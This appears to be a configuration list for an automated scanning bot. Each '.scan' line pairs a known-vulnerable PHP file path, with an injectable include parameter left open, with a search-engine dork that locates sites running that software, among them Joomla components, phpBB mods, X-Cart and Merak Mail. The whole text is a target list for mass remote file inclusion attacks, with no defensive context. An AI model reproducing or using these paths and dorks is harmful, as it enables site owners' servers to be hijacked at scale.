.scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
.scan components/com_moofaq/includes/file_includer.php?gzip=0&file= "com_moofaq"
.scan /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path= /com_fabrik/
.scan /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path= /com_fabrik/
.scan /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir= snippetmaster
.scan2 ?dir[func]=&dir[base]= "Ladder Scripts"
.scan /accounts/inc/errors.php?error= "Powered By: Merak Mail Server Software"
.scan conf.php?subdir= "wow roster"
.scan /config/config_admin.php?INC= "Keyword" "Add Your Site"
.scan src/admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=
.scan ?INCLUDE_FOLDER= "e404.php"?*.st"
.scan /?_zb_path= "/bbs/" "/zboard/"
.scan //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= index.php
.scan source/mod/rss/viewitem.php?Codebase= ED Engine
.scan source/mod/rss/channeledit.php?Codebase= WebEd
.scan prepare.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
.scan /admin/frontpage_right.php?loadadminpage= Copyright � 2007 Agares Media
.scan /index.php?get= inurl”index.php?get=”
.scan /index.php?target= inurl”index.php?target=”